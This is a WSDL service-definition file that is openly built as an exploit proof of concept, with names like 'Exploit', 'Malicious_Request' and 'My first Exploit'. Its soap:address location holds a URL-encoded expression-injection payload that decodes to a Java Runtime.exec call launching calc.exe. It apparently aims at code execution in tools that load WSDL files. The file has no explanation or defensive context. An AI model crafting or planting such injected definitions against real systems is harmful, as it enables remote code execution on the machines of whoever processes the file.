example.wsdl

<?xml version="1.0" encoding="UTF-8"?>
<wsdl:definitions
                xmlns:tm="http://microsoft.com/wsdl/mime/textMatching/"
                xmlns:soapenc="http://schemas.xmlsoap.org/soap/encoding/"
                xmlns:mime="http://schemas.xmlsoap.org/wsdl/mime/"
                xmlns:tns="http://example.com/stockquote.wsdl"
                xmlns:soap="http://schemas.xmlsoap.org/wsdl/soap/"
                xmlns:s="http://www.w3.org/2001/XMLSchema"
                xmlns:http="http://schemas.xmlsoap.org/wsdl/http/"
                targetNamespace="http://example.com/stockquote.wsdl"
                xmlns:wsdl="http://schemas.xmlsoap.org/wsdl/">

  <wsdl:types>
    <s:schema elementFormDefault="qualified" targetNamespace="http://example.com/stockquote.wsdl">
      <s:element name="Malicious_Request">
        <s:complexType>
          <s:sequence>
            <s:element name="Payload" default="PWNED" type="s:string" />
          </s:sequence>
        </s:complexType>
      </s:element>

    </s:schema>
  </wsdl:types>
  <wsdl:message name="Malicious_RequestSoapIn">
    <wsdl:part name="parameters" element="tns:Malicious_Request" />
  </wsdl:message>

  <wsdl:portType name="Exploit">
    <wsdl:operation name="Malicious_Request">
      <wsdl:documentation xmlns:wsdl="http://schemas.xmlsoap.org/wsdl/">Create a new xpl</wsdl:documentation>
      <wsdl:input message="tns:Malicious_RequestSoapIn" />
      <wsdl:output message="tns:Malicious_RequestSoapOut" />
    </wsdl:operation>
  </wsdl:portType>

  <wsdl:binding name="Exploit" type="tns:Exploit">
    <soap:binding transport="http://schemas.xmlsoap.org/soap/http" />
    <wsdl:operation name="Malicious_Request">
      <soap:operation soapAction="https://www.test.com.br/Malicious_Request" style="document" />
      <wsdl:input>
        <soap:body use="literal" />
      </wsdl:input>
      <wsdl:output>
        <soap:body use="literal" />
      </wsdl:output>
    </wsdl:operation>
  </wsdl:binding>

  <wsdl:service name="XPL">
    <wsdl:documentation xmlns:wsdl="http://schemas.xmlsoap.org/wsdl/">My first Exploit</wsdl:documentation>
    <wsdl:port name="Exploit" binding="tns:Exploit">
      <soap:address location="http%3A%2F%2F127.0.0.1%2F%24%7B%3DRuntime.getRuntime%28%29.exec%28%27calc.exe%27%29%7D%3B" />
    </wsdl:port>

  </wsdl:service>
</wsdl:definitions>